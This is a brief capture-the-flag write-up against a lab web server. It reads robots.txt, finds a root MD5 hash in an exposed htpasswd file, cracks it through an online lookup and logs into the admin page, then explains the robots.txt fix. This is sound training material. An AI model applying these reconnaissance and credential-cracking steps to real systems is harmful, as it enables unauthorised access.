blob: 710878e0a0052e22301f106ba0339ee55206fd74 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
## Exploit
[https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/01-Conduct_Search_Engine_Discovery_Reconnaissance_for_Information_Leakage]()
1. Explore public `robots.txt`
```bash
❯ curl http://10.0.2.15/robots.txt
User-agent: *
Disallow: /whatever
Disallow: /.hidden
```
1. Found a md5 hash for user `root` at `http://10.0.2.15/whatever/htpasswd`
1. Used [this website](https://md5.gromweb.com/) to reverse lookup the md5 hash and get `qwerty123@`
1. Found an admin interface by [enumerating some common application admin interfaces](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/05-Enumerate_Infrastructure_and_Application_Admin_Interfaces) at `http://10.0.2.15/admin`
1. Logged in the admin interface with the credentials to find the flag
## Fix
`robots.txt` purpose is to mark files and directories as not to be indexed by search engines crawlers. However, it makes anything written there publicly available so it should not contain sensitive data. Instead these resources must be stored outside of the web root and thus not mentionned at all in `robots.txt`.
|
